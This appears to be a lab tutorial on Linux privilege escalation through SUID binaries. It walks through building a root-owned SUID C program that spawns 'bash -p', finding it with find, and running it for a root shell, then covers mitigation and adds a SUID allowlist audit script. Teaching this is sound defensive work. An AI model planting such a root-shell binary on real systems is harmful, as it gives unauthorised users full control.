
Linux Privilege Escalation: SUID Binaries

Introduction

The SUID (Set User ID) bit is a special permission in Linux that allows a user to execute a program with the permissions of the file owner. This lab will guide you through identifying and exploiting a misconfigured SUID binary to escalate your privileges from a standard user to root.

For Educational Purposes Only

The techniques described in this lab should only be performed on systems you own or have explicit permission to test. Unauthorized access is illegal.

Lab Objectives

  • Understand how SUID permissions work.
  • Learn how to find all SUID-enabled files on a system.
  • Exploit a vulnerable SUID binary to gain a root shell.
  • Understand basic mitigation strategies.

Lab Setup

First, we need to create a vulnerable SUID binary. You can download the required source code file below or follow the steps to create it manually.

Download Lab Source Code

Contains the vulnerable.c file needed for this lab.

  1. Create a new C file named vulnerable.c:
Terminal
nano vulnerable.c
  2. Add the following code to the file. This program will grant root privileges and open a bash shell.
vulnerable.c
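#include <stdio.h>
#include <unistd.h>

int main(void) {
  /* Both calls succeed only when the file is root-owned with the SUID bit set */
  setuid(0);
  setgid(0);
  /* Replace this process with bash; -p keeps the elevated IDs */
  execl("/bin/bash", "bash", "-p", (char *)NULL);
  perror("execl"); /* reached only if execl fails */
  return 1;
}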

Bash '-p' Flag

The -p flag is crucial here. It prevents bash from dropping its effective root privileges when it starts, which is the default behavior for security reasons.

  3. Compile the program using gcc:
Terminal
gcc vulnerable.c -o vulnerable_shell
  4. As a privileged user (sudo), change ownership to root and set the SUID bit:
Terminal
sudo chown root:root vulnerable_shell
sudo chmod 4755 vulnerable_shell

Understanding chmod 4755

The 4 in 4755 sets the SUID bit. The 755 sets the standard permissions: read, write, and execute for the owner, and read and execute for the group and others.

Step 1: Reconnaissance - Finding SUID Binaries

As a low-privilege user, your first step is to find all files on the system with the SUID bit set. The find command is perfect for this.

Terminal
find / -perm -u=s -type f 2>/dev/null

This command will produce a list of all SUID binaries. You should see our vulnerable_shell in the output.

Step 2: Analysis - Identifying Vulnerable Binaries

After getting a list of SUID binaries, you need to identify which ones are abusable. In our case, vulnerable_shell is an obvious target. We can use the strings command to get a hint of what it does:

Terminal
strings ./vulnerable_shell

You will likely see /bin/bash in the output, which is a strong indicator that it can spawn a shell.

Step 3: Exploitation

This is the simplest part of this lab. Since the binary is designed to open a shell, all we have to do is execute it.

Terminal
./vulnerable_shell

Once you run it, check your user ID:

Terminal
id

The output should be uid=0(root) gid=0(root) groups=0(root),... Congratulations, you have successfully escalated your privileges to root!

Mitigation

Principle of Least Privilege

Never set the SUID bit on a file unless it is absolutely necessary. Regularly audit SUID binaries on your system and remove the permission from any that are not required.
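
One way to run the regular audit described above, as an added example that is not part of the original lab: it compares the SUID files found by find against an allowlist and removes the bit from anything unapproved. The function names and the allowlist format (one approved absolute path per line) are assumptions.

```shell
#!/bin/sh
# Added example, not from the original lab: audit SUID files against an allowlist.
# Assumption: ALLOWLIST holds one approved absolute path per line.

# List SUID regular files under DIR, sorted. -perm -4000 is the octal form
# of the -u=s test from Step 1; -xdev keeps find on a single filesystem.
suid_list() {
    find "$1" -xdev -type f -perm -4000 2>/dev/null | sort
}

# Print SUID files under DIR that are missing from ALLOWLIST.
# Returns 0 = nothing unexpected, 1 = unapproved files found, 2 = bad allowlist.
suid_unapproved() {
    dir=$1 allowlist=$2
    # Fail closed: an unreadable allowlist must not look like a clean audit.
    [ -r "$allowlist" ] || { echo "cannot read $allowlist" >&2; return 2; }
    # -F fixed strings, -x whole-line match, -v invert: keep unlisted paths.
    out=$(suid_list "$dir" | grep -vxF -f "$allowlist" || true)
    if [ -z "$out" ]; then return 0; fi
    printf '%s\n' "$out"
    return 1
}

# Remove the SUID bit from each unapproved file, logging its state first.
suid_strip_unapproved() {
    suid_unapproved "$1" "$2" | while IFS= read -r f; do
        ls -ln "$f"                      # owner and mode before the change
        chmod u-s "$f" && echo "removed SUID: $f"
    done
}
```

On a real host, scan / as root and review the output of suid_unapproved before running suid_strip_unapproved.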